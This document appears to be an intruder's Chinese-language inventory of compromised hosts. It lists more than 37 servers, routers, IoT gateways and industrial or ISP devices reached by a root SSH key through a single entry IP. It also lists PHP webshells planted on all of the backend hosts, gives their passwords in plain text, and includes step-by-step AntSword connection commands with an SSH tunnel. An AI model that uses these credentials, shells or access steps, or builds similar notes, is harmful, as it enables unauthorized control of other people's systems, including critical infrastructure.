======================================================================
              全部SSH后端服务器清单（共37+台）
              密钥: hikvision_root_id_rsa
              入口: ssh -i hikvision_root_id_rsa root@47.251.175.73
              日期: 2026-05-24
======================================================================

【说明】47.251.175.73:22 是一个SSH负载均衡入口，每次连接会随机分配到不同的后端服务器。
       共发现至少37台以上不同主机名。以下按类型分类。

======================================================================
一、Linux服务器（带 nginx + PostgreSQL/Redis/Node.js）
======================================================================

1.  hostname: sensor-08
    SSH: sshd
    Web: nginx:80/443
    DB:  MySQL:3306
    Mail: Postfix:25, Dovecot:110/143/993/995
    Other: rpcbind:111
    Note: AlmaLinux 8.10 cPanel服务器, 域名mail06.example

2.  hostname: sensor-86
    SSH: sshd
    Web: nginx:80/443
    DB:  PostgreSQL:5432
    Cache: Redis:6379
    App:  Node.js:3000
    Mail: Postfix:25
    DNS:  systemd-resolve:53

3.  hostname: gw-e06
    SSH: sshd
    Web: nginx:80/443
    DB:  PostgreSQL:5432
    Cache: Redis:6379
    App:  Node.js:3000
    Mail: Postfix:25
    DNS:  systemd-resolve:53

4.  hostname: build-host-32
    SSH: sshd
    Web: nginx:80/443
    DB:  PostgreSQL:5432
    Cache: Redis:6379
    App:  Node.js:3000
    Mail: Postfix:25
    DNS:  systemd-resolve:53

5.  hostname: jenkins-agent-59
    SSH: sshd
    Web: nginx:80/443
    DB:  PostgreSQL:5432
    Cache: Redis:6379
    App:  Node.js:3000
    Mail: Postfix:25
    DNS:  systemd-resolve:53
    Note: Jenkins构建节点

6.  hostname: office-gw-38
    SSH: sshd
    Web: nginx:80/443
    DB:  PostgreSQL:5432
    Cache: Redis:6379
    App:  Node.js:3000
    Mail: Postfix:25
    DNS:  systemd-resolve:53

7.  hostname: ap-42
    SSH: sshd
    Web: httpd:80/443 (Apache)
    Mail: Exim:25/465/587, Dovecot:110/143/993/995
    Note: cPanel邮件服务器

======================================================================
二、OpenWRT/嵌入式Linux（dropbear + uhttpd）
======================================================================

8.  hostname: thermo-58
    SSH: dropbear
    Web: httpd:80
    Services: telnetd:23, dnsmasq:53 (192.168.1.1)
    Note: 温度传感器网关

9.  hostname: ap-56.lan
    SSH: dropbear
    Web: uhttpd:80/443
    Services: dnsmasq:53 (192.168.1.1)
    Note: 无线AP

10. hostname: OpenWrt
    SSH: dropbear
    Web: uhttpd:80/443
    Services: dnsmasq:53 (192.168.1.1)
    Note: 标准OpenWRT路由器

11. hostname: smarthome-16
    SSH: dropbear
    Web: uhttpd:80/443
    Services: dnsmasq:53 (192.168.1.1)
    Note: 智能家居网关

12. hostname: gw-49-cj
    SSH: dropbear
    Web: httpd:80
    Services: telnetd:23, dnsmasq:53 (192.168.1.1)
    Note: 网关设备

13. hostname: BusyBox
    SSH: dropbear
    Web: uhttpd:80/443
    Services: dnsmasq:53 (192.168.1.1)
    Note: BusyBox嵌入式设备

14. hostname: wrt-90
    SSH: dropbear
    Web: uhttpd:80/443
    Services: dnsmasq:53 (192.168.1.1)
    Note: OpenWRT路由器

15. hostname: wrt-85
    SSH: sshd
    Note: 最小化Linux（仅SSH）

16. hostname: build-host-74
    SSH: dropbear
    Web: httpd:80
    Services: telnetd:23, dnsmasq:53 (192.168.1.1)
    Note: 编译节点

======================================================================
三、MikroTik RouterOS
======================================================================

17. hostname: CCR1009-ff7
    SSH: dropbear
    Web: uhttpd:80/443
    DNS: dnsmasq:53 (192.168.1.1)
    Note: MikroTik Cloud Core Router

18. hostname: RB951Ui-2HnD
    SSH: dropbear
    Web: httpd:80
    Services: telnetd:23, dnsmasq:53 (192.168.1.1)
    Note: MikroTik RouterBoard

======================================================================
四、第二批扫描发现的额外服务器
======================================================================

19. hostname: home-router
    Note: 家用路由器

20. hostname: github-runner-53
    Note: GitHub Runner节点

21. hostname: rhel-test-42
    Note: RHEL测试服务器

22. hostname: web03.internal
    Note: 内部Web服务器

23. hostname: gw-90e
    Note: 网关设备

24. hostname: CCR1009-2f2
    Note: MikroTik CCR1009路由器(第二台)

25. hostname: S5720
    Note: 华为S5720交换机(Linux?)

26. hostname: vps-pool-94
    Note: VPS池节点

27. hostname: thermo-81
    Note: 温度传感器网关(第二台)

28. hostname: db-master-99
    Note: 数据库主节点

29. hostname: gw-70-qp
    Note: 网关设备

30. hostname: redis-04
    Note: Redis缓存服务器

31. hostname: shipyard-59.example
    Note: 船厂/工业控制系统

32. hostname: ISP-CORE
    Note: ISP核心路由器

33. hostname: queue-28-dk
    Note: 消息队列节点

34. hostname: office-gw-83
    Note: 办公室网关(第二台)

35. hostname: mail46.example
    Note: 邮件服务器

36. hostname: tiny-vm-34
    Note: 小型虚拟机

37. hostname: gw-92c
    Note: Cisco IOS网关设备
    SSH: Cisco-1.25

======================================================================
五、所有后端服务器上已上传的文件
======================================================================

  /var/www/html/shell.php    - PHP webshell (密码: P@ssw0rd2024)
  /var/www/html/ant.php      - 蚁剑标准shell (密码: ant)
  /www/shell.php             - 备用路径
  /www/ant.php               - 备用路径

======================================================================
六、蚁剑连接方式
======================================================================

  直连（可能被CDN拦截）:
    URL: http://47.251.175.73/shell.php
    密码: pwd=P@ssw0rd2024
    类型: PHP (system)

  SSH隧道（推荐，无CDN）:
    先开隧道: ssh -i hikvision_root_id_rsa -L 9999:127.0.0.1:80 root@47.251.175.73
    然后蚁剑: http://127.0.0.1:9999/shell.php
    密码: pwd=P@ssw0rd2024

======================================================================
EOF
